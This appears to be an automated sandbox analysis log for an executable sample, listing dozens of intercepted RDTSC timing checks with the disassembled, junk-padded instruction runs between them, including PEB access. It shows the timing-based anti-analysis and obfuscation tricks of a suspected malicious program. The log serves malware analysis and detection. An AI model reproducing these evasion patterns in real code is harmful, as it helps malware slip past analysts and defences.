Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: 71F00FE second address: 71F0102 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: 71F0102 second address: 71F0125 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F7620BAC888h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: 71F0125 second address: 71F012B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: 71F012B second address: 71F014A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, esi 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F7620BAC884h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: 71F014A second address: 71F01B2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ecx, edi 0x00000005 movsx ebx, ax 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov esi, dword ptr [772406ECh] 0x00000011 jmp 00007F7620C9DE54h 0x00000016 test esi, esi 0x00000018 jmp 00007F7620C9DE50h 0x0000001d jne 00007F7620C9EC01h 0x00000023 push eax 0x00000024 push edx 0x00000025 pushad 0x00000026 pushfd 0x00000027 jmp 00007F7620C9DE4Dh 0x0000002c xor ecx, 530721D6h 0x00000032 jmp 00007F7620C9DE51h 0x00000037 popfd 0x00000038 push eax 0x00000039 push edx 0x0000003a rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: 71F01B2 second address: 71F01B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: 71F01B7 second address: 71F01F2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7620C9DE57h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, edi 0x0000000a jmp 00007F7620C9DE56h 0x0000000f push eax 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 mov edi, 41966422h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: 71F01F2 second address: 71F026D instructions: 0x00000000 rdtsc 0x00000002 mov si, di 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov si, di 0x0000000a popad 0x0000000b xchg eax, edi 0x0000000c pushad 0x0000000d call 00007F7620BAC887h 0x00000012 pushfd 0x00000013 jmp 00007F7620BAC888h 0x00000018 jmp 00007F7620BAC885h 0x0000001d popfd 0x0000001e pop eax 0x0000001f jmp 00007F7620BAC881h 0x00000024 popad 0x00000025 call dword ptr [77210B60h] 0x0000002b mov eax, 766BE5E0h 0x00000030 ret 0x00000031 push eax 0x00000032 push edx 0x00000033 jmp 00007F7620BAC87Dh 0x00000038 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: 71F026D second address: 71F0273 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: 71F0273 second address: 71F02BD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push 00000044h 0x0000000a jmp 00007F7620BAC87Fh 0x0000000f pop edi 0x00000010 jmp 00007F7620BAC886h 0x00000015 xchg eax, edi 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007F7620BAC887h 0x0000001d rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: 71F02BD second address: 71F02E3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov si, dx 0x00000006 mov dh, 6Ch 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c jmp 00007F7620C9DE4Dh 0x00000011 xchg eax, edi 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 mov edx, 3B31315Eh 0x0000001a mov ax, di 0x0000001d popad 0x0000001e rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: 71F02E3 second address: 71F033B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7620BAC880h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push dword ptr [eax] 0x0000000b jmp 00007F7620BAC880h 0x00000010 mov eax, dword ptr fs:[00000030h] 0x00000016 jmp 00007F7620BAC880h 0x0000001b push dword ptr [eax+18h] 0x0000001e push eax 0x0000001f push edx 0x00000020 jmp 00007F7620BAC887h 0x00000025 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: 71F033B second address: 71F0341 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: 71F0341 second address: 71F0345 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: 71F0388 second address: 71F03E6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7620C9DE59h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test esi, esi 0x0000000b pushad 0x0000000c jmp 00007F7620C9DE4Ch 0x00000011 call 00007F7620C9DE52h 0x00000016 jmp 00007F7620C9DE52h 0x0000001b pop eax 0x0000001c popad 0x0000001d je 00007F7690C6D114h 0x00000023 pushad 0x00000024 push eax 0x00000025 push edx 0x00000026 movsx ebx, cx 0x00000029 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: 71F03E6 second address: 71F03FD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 movzx esi, dx 0x00000009 popad 0x0000000a mov eax, 00000000h 0x0000000f pushad 0x00000010 mov dh, al 0x00000012 push eax 0x00000013 push edx 0x00000014 movsx ebx, ax 0x00000017 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: 71F03FD second address: 71F040C instructions: 0x00000000 rdtsc 0x00000002 mov edx, esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esi], edi 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: 71F040C second address: 71F0421 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7620BAC881h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: 71F0421 second address: 71F0478 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F7620C9DE57h 0x00000009 sub ecx, 1465F66Eh 0x0000000f jmp 00007F7620C9DE59h 0x00000014 popfd 0x00000015 mov dx, si 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b mov dword ptr [esi+04h], eax 0x0000001e jmp 00007F7620C9DE4Ah 0x00000023 mov dword ptr [esi+08h], eax 0x00000026 push eax 0x00000027 push edx 0x00000028 push eax 0x00000029 push edx 0x0000002a push eax 0x0000002b push edx 0x0000002c rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: 71F0478 second address: 71F047C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: 71F047C second address: 71F0482 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: 71F05C2 second address: 71F05C8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: 71F05C8 second address: 71F05CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: 71F05CC second address: 71F05D0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: 71F05D0 second address: 71F05DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esi+20h], eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: 71F05DE second address: 71F063F instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 mov ax, bx 0x0000000a mov bh, C8h 0x0000000c popad 0x0000000d popad 0x0000000e mov eax, dword ptr [ebx+60h] 0x00000011 pushad 0x00000012 jmp 00007F7620BAC886h 0x00000017 jmp 00007F7620BAC882h 0x0000001c popad 0x0000001d mov dword ptr [esi+24h], eax 0x00000020 push eax 0x00000021 push edx 0x00000022 pushad 0x00000023 call 00007F7620BAC87Dh 0x00000028 pop ecx 0x00000029 jmp 00007F7620BAC881h 0x0000002e popad 0x0000002f rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: 71F063F second address: 71F0688 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7620C9DE51h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [ebx+64h] 0x0000000c jmp 00007F7620C9DE4Eh 0x00000011 mov dword ptr [esi+28h], eax 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 pushfd 0x00000018 jmp 00007F7620C9DE4Dh 0x0000001d jmp 00007F7620C9DE4Bh 0x00000022 popfd 0x00000023 pushad 0x00000024 popad 0x00000025 popad 0x00000026 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: 71F0688 second address: 71F06B5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7620BAC87Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [ebx+68h] 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F7620BAC885h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: 71F06B5 second address: 71F070C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ebx 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esi+2Ch], eax 0x0000000b pushad 0x0000000c mov ch, 2Eh 0x0000000e pushad 0x0000000f mov dl, 9Ch 0x00000011 mov dx, ax 0x00000014 popad 0x00000015 popad 0x00000016 mov ax, word ptr [ebx+6Ch] 0x0000001a pushad 0x0000001b mov ax, 5BADh 0x0000001f pushad 0x00000020 movzx esi, di 0x00000023 popad 0x00000024 popad 0x00000025 mov word ptr [esi+30h], ax 0x00000029 push eax 0x0000002a push edx 0x0000002b pushad 0x0000002c pushad 0x0000002d popad 0x0000002e pushfd 0x0000002f jmp 00007F7620C9DE56h 0x00000034 sbb ax, 8CA8h 0x00000039 jmp 00007F7620C9DE4Bh 0x0000003e popfd 0x0000003f popad 0x00000040 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: 71F070C second address: 71F0724 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F7620BAC884h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: 71F0724 second address: 71F073F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ax, word ptr [ebx+00000088h] 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F7620C9DE4Ah 0x00000016 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: 71F073F second address: 71F0744 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: 71F0744 second address: 71F0803 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 call 00007F7620C9DE57h 0x00000009 pop eax 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov word ptr [esi+32h], ax 0x00000011 pushad 0x00000012 mov si, dx 0x00000015 pushad 0x00000016 pushfd 0x00000017 jmp 00007F7620C9DE57h 0x0000001c xor si, DD5Eh 0x00000021 jmp 00007F7620C9DE59h 0x00000026 popfd 0x00000027 popad 0x00000028 popad 0x00000029 mov eax, dword ptr [ebx+0000008Ch] 0x0000002f pushad 0x00000030 mov cx, 1F1Fh 0x00000034 mov ax, 8E3Bh 0x00000038 popad 0x00000039 mov dword ptr [esi+34h], eax 0x0000003c pushad 0x0000003d mov ecx, 02F189B3h 0x00000042 popad 0x00000043 mov eax, dword ptr [ebx+18h] 0x00000046 pushad 0x00000047 movsx edx, si 0x0000004a mov edi, esi 0x0000004c popad 0x0000004d mov dword ptr [esi+38h], eax 0x00000050 pushad 0x00000051 mov ecx, 70F6C61Bh 0x00000056 call 00007F7620C9DE50h 0x0000005b push esi 0x0000005c pop edi 0x0000005d pop ecx 0x0000005e popad 0x0000005f mov eax, dword ptr [ebx+1Ch] 0x00000062 push eax 0x00000063 push edx 0x00000064 jmp 00007F7620C9DE58h 0x00000069 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: 71F0803 second address: 71F0809 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: 71F0809 second address: 71F080D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: 71F080D second address: 71F085A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7620BAC87Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esi+3Ch], eax 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 pushfd 0x00000012 jmp 00007F7620BAC883h 0x00000017 sub al, 0000003Eh 0x0000001a jmp 00007F7620BAC889h 0x0000001f popfd 0x00000020 mov bl, ch 0x00000022 popad 0x00000023 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: 71F085A second address: 71F0877 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F7620C9DE59h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: 71F0877 second address: 71F087B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: 71F087B second address: 71F088E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [ebx+20h] 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e mov si, FD75h 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: 71F088E second address: 71F089F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F7620BAC87Dh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: 71F089F second address: 71F08C8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7620C9DE51h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esi+40h], eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F7620C9DE4Dh 0x00000015 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: 71F08C8 second address: 71F08CE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: 71F08CE second address: 71F08D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: 71F08D2 second address: 71F08D6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: 71F08D6 second address: 71F08F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 lea eax, dword ptr [ebx+00000080h] 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F7620C9DE51h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: 71F08F9 second address: 71F08FF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: 71F09DC second address: 71F09FB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7620C9DE54h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: 71F09FB second address: 71F09FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: 71F09FF second address: 71F0A05 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: 71F0A05 second address: 71F0A14 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F7620BAC87Bh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: 71F0A14 second address: 71F0A18 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: 71F0A2C second address: 71F0A30 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: 71F0A30 second address: 71F0A34 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: 71F0A34 second address: 71F0A3A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: 71F0A3A second address: 71F0ADB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edx, 3A2DCE2Ah 0x00000008 mov al, bh 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov edi, eax 0x0000000f pushad 0x00000010 pushfd 0x00000011 jmp 00007F7620C9DE58h 0x00000016 add ch, 00000018h 0x00000019 jmp 00007F7620C9DE4Bh 0x0000001e popfd 0x0000001f push ecx 0x00000020 mov edi, 6E85893Ah 0x00000025 pop edi 0x00000026 popad 0x00000027 test edi, edi 0x00000029 pushad 0x0000002a pushfd 0x0000002b jmp 00007F7620C9DE4Ch 0x00000030 add ch, 00000078h 0x00000033 jmp 00007F7620C9DE4Bh 0x00000038 popfd 0x00000039 mov ebx, esi 0x0000003b popad 0x0000003c js 00007F7690C6CA6Dh 0x00000042 pushad 0x00000043 mov ch, 87h 0x00000045 popad 0x00000046 mov eax, dword ptr [ebp-0Ch] 0x00000049 jmp 00007F7620C9DE56h 0x0000004e mov dword ptr [esi+04h], eax 0x00000051 push eax 0x00000052 push edx 0x00000053 jmp 00007F7620C9DE57h 0x00000058 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: 71F0ADB second address: 71F0AE1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: 71F0AE1 second address: 71F0B7D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7620C9DE4Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b lea eax, dword ptr [ebx+78h] 0x0000000e pushad 0x0000000f jmp 00007F7620C9DE54h 0x00000014 pushad 0x00000015 mov edx, esi 0x00000017 pushfd 0x00000018 jmp 00007F7620C9DE4Ch 0x0000001d sbb eax, 326D97F8h 0x00000023 jmp 00007F7620C9DE4Bh 0x00000028 popfd 0x00000029 popad 0x0000002a popad 0x0000002b push 00000001h 0x0000002d jmp 00007F7620C9DE56h 0x00000032 nop 0x00000033 jmp 00007F7620C9DE50h 0x00000038 push eax 0x00000039 pushad 0x0000003a mov bx, CE34h 0x0000003e push ebx 0x0000003f pop ebx 0x00000040 popad 0x00000041 nop 0x00000042 jmp 00007F7620C9DE52h 0x00000047 lea eax, dword ptr [ebp-08h] 0x0000004a pushad 0x0000004b mov ebx, esi 0x0000004d push eax 0x0000004e push edx 0x0000004f mov ebx, eax 0x00000051 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: 71F0B7D second address: 71F0B93 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 nop 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F7620BAC87Ah 0x00000011 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: 71F0B93 second address: 71F0B97 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: 71F0B97 second address: 71F0B9D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: 71F0B9D second address: 71F0BA3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: 71F0BA3 second address: 71F0BA7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: 71F0BA7 second address: 71F0BCA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a mov dl, 21h 0x0000000c mov cx, 508Dh 0x00000010 popad 0x00000011 nop 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F7620C9DE4Fh 0x00000019 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: 71F0BCA second address: 71F0BD0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: 71F0BD0 second address: 71F0BD4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: 71F0C74 second address: 71F0C7A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: 71F0C7A second address: 71F0D47 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7620C9DE53h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esi+08h], eax 0x0000000e pushad 0x0000000f pushfd 0x00000010 jmp 00007F7620C9DE54h 0x00000015 adc ch, FFFFFFE8h 0x00000018 jmp 00007F7620C9DE4Bh 0x0000001d popfd 0x0000001e movzx eax, di 0x00000021 popad 0x00000022 lea eax, dword ptr [ebx+70h] 0x00000025 pushad 0x00000026 pushfd 0x00000027 jmp 00007F7620C9DE51h 0x0000002c adc si, 1506h 0x00000031 jmp 00007F7620C9DE51h 0x00000036 popfd 0x00000037 mov eax, 6C5260B7h 0x0000003c popad 0x0000003d push 00000001h 0x0000003f pushad 0x00000040 pushfd 0x00000041 jmp 00007F7620C9DE58h 0x00000046 add ah, FFFFFFD8h 0x00000049 jmp 00007F7620C9DE4Bh 0x0000004e popfd 0x0000004f mov ax, B18Fh 0x00000053 popad 0x00000054 nop 0x00000055 jmp 00007F7620C9DE52h 0x0000005a push eax 0x0000005b push eax 0x0000005c push edx 0x0000005d push eax 0x0000005e push edx 0x0000005f jmp 00007F7620C9DE4Dh 0x00000064 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: 71F0D47 second address: 71F0D4B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: 71F0D4B second address: 71F0D51 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: 71F0D51 second address: 71F0D94 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7620BAC87Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a jmp 00007F7620BAC880h 0x0000000f lea eax, dword ptr [ebp-18h] 0x00000012 pushad 0x00000013 call 00007F7620BAC87Eh 0x00000018 mov cx, A2D1h 0x0000001c pop ecx 0x0000001d mov ax, dx 0x00000020 popad 0x00000021 push eax 0x00000022 push eax 0x00000023 push edx 0x00000024 push eax 0x00000025 push edx 0x00000026 push eax 0x00000027 push edx 0x00000028 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: 71F0D94 second address: 71F0D98 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
